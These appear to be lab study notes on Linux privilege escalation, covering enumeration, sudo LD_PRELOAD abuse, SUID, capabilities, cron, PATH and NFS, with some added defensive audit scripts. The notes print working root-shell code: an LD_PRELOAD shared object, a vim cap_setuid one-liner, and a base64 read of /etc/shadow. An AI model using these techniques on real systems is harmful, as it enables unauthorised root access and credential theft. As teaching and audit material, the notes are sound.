LINUX Privilege Escalation

Uploaded by

tehila2038

LINUX privilege escalation

Enumeration

hostname : can provide information about the target system’s role within the corporate network (e.g. SQL-PROD-01 for a production SQL server).
uname -a : prints system information, giving us additional detail about the kernel used by the system.
/proc/version : the proc filesystem (procfs) provides information about the target system’s processes. Looking at /proc/version may give you information on the
kernel version and additional data such as whether a compiler (e.g. GCC) is installed.
/etc/issue : while on the subject, any file containing system information can be customized or changed. For a clearer understanding of the system, it is always
good to look at all of these.

ps Command
ps aux : The aux option will show processes for all users (a), display the user that launched the process (u), and show processes that are not attached to a
terminal (x).
ps -A : View all running processes
ps axjf : View process tree (see the tree formation until ps axjf is run below)

env command will show environmental variables.


sudo -l command can be used to list all commands your user can run using sudo.
/etc/passwd file can be an easy way to discover users on the system: cat /etc/passwd | cut -d ":" -f 1
ifconfig command will give us information about the network interfaces of the system. This can be confirmed using the ip route command to see which
network routes exist.
netstat command can be used with several different options to gather information on existing connections.
netstat -a : shows all listening ports and established connections.
netstat -at or netstat -au can also be used to list TCP or UDP protocols respectively.
netstat -l : list ports in “listening” mode. These ports are open and ready to accept incoming connections. This can be used with the “t” option to list only
ports that are listening using the TCP protocol
netstat -s : list network usage statistics by protocol (below) This can also be used with the -t or -u options to limit the output to a specific protocol.
netstat -tp : list connections with the service name and PID information. This can also be used with the -l option to list listening ports
netstat -i : Shows interface statistics.
netstat -ano which could be broken down as follows;
-a : Display all sockets
-n : Do not resolve names
-o : Display timers

find . -name flag1.txt : find the file named “flag1.txt” in the current directory
find /home -name flag1.txt : find the file named “flag1.txt” in the /home directory
find / -type d -name config : find the directory named config under “/”
find / -type f -perm 0777 : find files with the 777 permissions (files readable, writable, and executable by all users)
find / -perm a=x : find executable files
find /home -user frank : find all files for user “frank” under “/home”
find / -mtime 10 : find files that were modified in the last 10 days
find / -atime 10 : find files that were accessed in the last 10 days
find / -cmin -60 : find files changed within the last hour (60 minutes)
find / -amin -60 : find files accessed within the last hour (60 minutes)
find / -size 50M : find files with a 50 MB size
It is important to note that the “find” command tends to generate errors which sometimes makes the output hard to read. This is why it would be wise to use
the “find” command with “-type f 2>/dev/null” to redirect errors to “/dev/null” and have a cleaner output

Folders and files that can be written to or executed from:

find / -writable -type d 2>/dev/null : Find world-writeable folders


find / -perm -222 -type d 2>/dev/null : Find world-writeable folders
find / -perm -o w -type d 2>/dev/null : Find world-writeable folders
find / -perm -o x -type d 2>/dev/null : Find world-executable folders

Find development tools and supported languages:

find / -name perl*


find / -name python*
find / -name gcc*

find / -perm -u=s -type f 2>/dev/null : Find files with the SUID bit, which allows us to run the file with a higher privilege level than the current
user.
Please spend some time getting comfortable with commands such as find, locate, grep, cut, sort, etc

============================================================================

AUTOMATED enumeration tools


Several tools can help you save time during the enumeration process. These tools should only be used to save time knowing they may miss some privilege
escalation vectors. Below is a list of popular Linux enumeration tools with links to their respective Github repositories.

The target system’s environment will influence the tool you will be able to use. For example, you will not be able to run a tool written in Python if it is not
installed on the target system. This is why it would be better to be familiar with a few rather than having a single go-to tool.

LinPeas:
LinEnum:
LES (Linux Exploit Suggester):
Linux Smart Enumeration:
Linux Priv Checker:

===============================================================================
P/E;kernel exploits

The kernel on Linux systems manages the communication between components such as the memory on the system and applications. This critical function
requires the kernel to have specific privileges; thus, a successful exploit will potentially lead to root privileges.

The Kernel exploit methodology is simple;


1. Identify the kernel version
2. Search and find an exploit code for the kernel version of the target system
3. Run the exploit

Research sources:

1. Based on your findings, you can use Google to search for an existing exploit code.
2. Sources such as https://www.linuxkernelcves.com/cves can also be useful.
3. Another alternative would be to use a script like LES (Linux Exploit Suggester) but remember that these tools can generate false positives (report a kernel
vulnerability that does not affect the target system) or false negatives (not report any kernel vulnerabilities although the kernel is vulnerable).

You can transfer the exploit code from your machine to the target system using the SimpleHTTPServer Python module and wget respectively.

===============================================================================

P/E;sudo

The sudo command, by default, allows you to run a program with root privileges. Under some conditions, system administrators may need to give regular
users some flexibility on their privileges. For example, a junior SOC analyst may need to use Nmap regularly but would not be cleared for full root access. In
this situation, the system administrator can allow this user to only run Nmap with root privileges while keeping its regular privilege level throughout the rest of
the system.

Any user can check its current situation related to root privileges using the sudo -l command.

is a valuable source that provides information on how any program, on which you may have sudo rights, can be used.

Some applications will not have a known exploit within this context. In this case, we can use a "hack" to leak information leveraging a function of the
application.

Leverage LD_PRELOAD
LD_PRELOAD is an environment variable that tells the dynamic loader to load the listed shared libraries before any other library a program uses. This post will give
you an idea about the capabilities of LD_PRELOAD. If the "env_keep" option in sudoers preserves LD_PRELOAD, we can generate a shared library which will be loaded and
executed before the program is run. Please note the LD_PRELOAD option will be ignored if the real user ID is different from the effective user ID.

The steps of this privilege escalation vector can be summarized as follows;

1. Check for LD_PRELOAD (with the env_keep option)
2. Write a simple C code compiled as a shared object (.so extension) file
3. Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file

The C code will simply spawn a root shell and can be written as follows;

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* declares setgid() and setuid() */

/* Runs when the shared object is loaded, i.e. before the sudo'd program's main(). */
void _init() {
    unsetenv("LD_PRELOAD");   /* so the spawned shell does not preload this library again */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
```

We can save this code as shell.c and compile it using gcc into a shared object file.
We then need to run the program with sudo, specifying the LD_PRELOAD option, as follows;

```sh
sudo LD_PRELOAD=/home/user/ldpreload/shell.so find
```

This will result in a shell spawned with root privileges.

=============================================================================

P/E;SUID

Much of Linux privilege control relies on controlling the interaction between users and files. This is done with permissions. By now, you know that files can have read,
write, and execute permissions. These are given to users within their privilege levels. This changes with SUID (Set-user Identification) and SGID (Set-group
Identification). These allow files to be executed with the permission level of the file owner or the group owner, respectively.
These files have an “s” bit set showing their special permission level.

find / -type f -perm -04000 -ls 2>/dev/null will list files that have SUID or SGID bits set.

Example with base64:
/usr/bin/base64 /etc/shadow | /usr/bin/base64 -d : when base64 has the SUID bit set, this can be used to read any file, as we did here with /etc/shadow.
base64 reads the file with its owner's privileges and encodes it; piping the output into base64 -d decodes it so we can read it.

==============================================================================

P/E;capabilities

Capabilities help manage privileges at a more granular level. We can use the getcap tool to list enabled capabilities.
When run as an unprivileged user, getcap -r / will generate a huge amount of errors, so it is good practice to redirect the error messages to /dev/null .

If, for example, the vim binary carries a capability that lets it change its user ID (cap_setuid), it can be used to spawn a root shell:

```sh
./vim -c ':python3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
```

==============================================================================

P/E;cron jobs

Cron jobs are used to run scripts or binaries at specific times. By default, they run with the privilege of their owners and not the current user. While properly
configured cron jobs are not inherently vulnerable, they can provide a privilege escalation vector under some conditions.
The idea is quite simple: if there is a scheduled task that runs with root privileges and we can change the script that will be run, then our script will run with root
privileges. Cron job configurations are stored as crontabs (cron tables), which also show the next time and date the task will run.
Any user can read the file keeping system-wide cron jobs under /etc/crontab.

Task: for our first method we use the backup.sh file to gain root, using SUID permission. We need to be root to read the flag5.txt file. We see that we
have an .sh file that is automatically run every minute. To become root, we just need to change the contents of the backup.sh file (nano backup.sh) so that it
gives the SUID permission to /bin/bash with the chmod command; we can then run /bin/bash and become root:

```sh
#!/bin/bash
chmod u+s /bin/bash   # u+s gives the SUID permission
```

After editing backup.sh we make it executable with the chmod command; once the cron job has run, /bin/bash -p gives a root shell:

```sh
chmod 777 backup.sh

/bin/bash -p
```
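From the defender's side, the condition above is a root cron entry whose script is writable by others. The helper below is an added audit example, not part of the original notes: it reads a file in /etc/crontab format (minute hour dom month dow user command) and reports scheduled commands whose target is world-writable or missing. The file name, the backup.sh sample and the output format are assumptions of this example.

```sh
#!/bin/sh
# Added audit helper (not part of the original notes): given a file in
# /etc/crontab format (min hour dom mon dow user command), print the scheduled
# commands whose target file is world-writable, i.e. the misconfiguration that
# lets an unprivileged user change what a root cron job runs.
cron_writable_scripts() {
    crontab_file="$1"
    # Drop comments, blank lines and VAR=value assignments (SHELL=, PATH=, ...).
    grep -Ev '^[[:space:]]*(#|$)' "$crontab_file" |
    grep -Ev '^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' |
    while read -r min hour dom mon dow user cmd; do
        # The first token of the command is what cron executes.
        target=${cmd%% *}
        # Only absolute paths are checked; relative names depend on the crontab's PATH.
        case "$target" in
            /*) ;;
            *)  continue ;;
        esac
        if [ ! -e "$target" ]; then
            printf 'MISSING %s (user %s): a writable parent directory would let anyone create it\n' "$target" "$user"
            continue
        fi
        # -perm -o=w matches when the "other" write bit is set (e.g. mode 777 backup.sh).
        if [ -n "$(find "$target" -prune -perm -o=w 2>/dev/null)" ]; then
            printf 'WRITABLE %s (runs as %s, schedule: %s %s %s %s %s)\n' \
                "$target" "$user" "$min" "$hour" "$dom" "$mon" "$dow"
        fi
    done
}

# Usage on a live system: cron_writable_scripts /etc/crontab
```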

==============================================================================

P/E;PATH
If a folder for which your user has write permission is located in the path, you could potentially hijack an application to run a script. PATH in Linux is an
environmental variable that tells the operating system where to search for executables. For any command that is not built into the shell or that is not defined
with an absolute path, Linux will start searching in folders defined under PATH.
If we type “thm” to the command line, these are the locations Linux will look in for an executable called thm. The scenario below will give you a better idea of
how this can be leveraged to increase our privilege level. As you will see, this depends entirely on the existing configuration of the target system, so be sure
you can answer the questions below before trying this.

What folders are located under $PATH


Does your current user have write privileges for any of these folders?
Can you modify PATH?
Is there a script/application you can start that will be affected by this vulnerability?
A simple search for writable folders can be done using the “find / -writable 2>/dev/null” command. The output of this command can be cleaned using a simple
cut and sort sequence. At this point, because /tmp is not present in PATH, we add it with the “export PATH=/tmp:$PATH” command.
At this point the path script will also look under the /tmp folder for an executable named “thm”.
Creating this command is fairly easy by copying /bin/bash as “thm” under the /tmp folder. We have given executable rights to our copy of /bin/bash.
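The questions above (what is in PATH, and is any of it writable) can be answered by one check. The helper below is an added example, not part of the original notes: it walks a PATH value and reports the entries that make command lookup hijackable. The function name and report labels are this example's own; it assumes it is run as the account being audited, since -w is always true for root.

```sh
#!/bin/sh
# Added audit helper (not part of the original notes): walk a PATH value and
# report the entries that make command lookup hijackable: directories the
# current user can write to, empty or relative entries (the current directory
# gets searched), and entries that do not exist (a writable parent would let
# anyone create them). Takes the PATH string as $1; defaults to $PATH.
path_writable_dirs() (
    path=${1:-$PATH}
    # A trailing ':' is an empty entry too, but shell field splitting drops it.
    case "$path" in *:) echo "EMPTY-ENTRY (trailing ':' searches the current directory)" ;; esac
    IFS=':'
    for dir in $path; do
        if [ -z "$dir" ]; then
            echo "EMPTY-ENTRY (current directory is searched)"
        elif [ "${dir#/}" = "$dir" ]; then
            echo "RELATIVE $dir"
        elif [ ! -d "$dir" ]; then
            echo "MISSING $dir"
        elif [ -w "$dir" ]; then
            # -w is always true for root; run this as the account being audited.
            echo "WRITABLE $dir"
        fi
    done
)

# Usage on a live system: path_writable_dirs "$PATH"
```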

==============================================================================

P/E;NFS

NFS (Network File System) configuration is kept in the /etc/exports file. This file is created during the NFS server installation and can usually be read by
users. The critical element for this privilege escalation vector is the “no_root_squash” option. By default, NFS maps the root user to nfsnobody (root squashing), so
files written over the share never carry root privileges. If the “no_root_squash” option is present on a writable share, we can create an executable with SUID bit set and
run it on the target system.
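Checking an NFS server for this misconfiguration means reading /etc/exports for shares that combine rw with no_root_squash. The helper below is an added example, not part of the original notes: it parses a file in /etc/exports format and reports every share exported with no_root_squash, rating rw shares higher than ro ones. The function name, severity labels and the sample exports file are assumptions of this example.

```sh
#!/bin/sh
# Added audit helper (not part of the original notes): parse a file in
# /etc/exports format and report every share exported with no_root_squash,
# the option that lets a remote root keep root ownership (and SUID bits) on
# files it writes to the share. Takes the exports file path as $1.
nfs_risky_exports() (
    set -f   # client specs such as *(rw,...) must not be glob-expanded
    grep -Ev '^[[:space:]]*(#|$)' "$1" | while read -r share clients; do
        # Each client spec is host(opt,opt,...); a line may list several specs.
        for spec in $clients; do
            case "$spec" in
                *\(*\)) host=${spec%%\(*}; opts=${spec#*\(}; opts=${opts%\)} ;;
                *)      host=$spec; opts="" ;;   # no options: root_squash is the default
            esac
            case ",$opts," in
                *,no_root_squash,*)
                    # rw + no_root_squash is the vector described above; ro only exposes root-owned data.
                    case ",$opts," in
                        *,rw,*) level=HIGH ;;
                        *)      level=MEDIUM ;;
                    esac
                    printf '%s %s -> %s (%s)\n' "$level" "$share" "$host" "$opts"
                    ;;
            esac
        done
    done
)

# Usage on a live NFS server: nfs_risky_exports /etc/exports
```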
example ;
=============================================================================
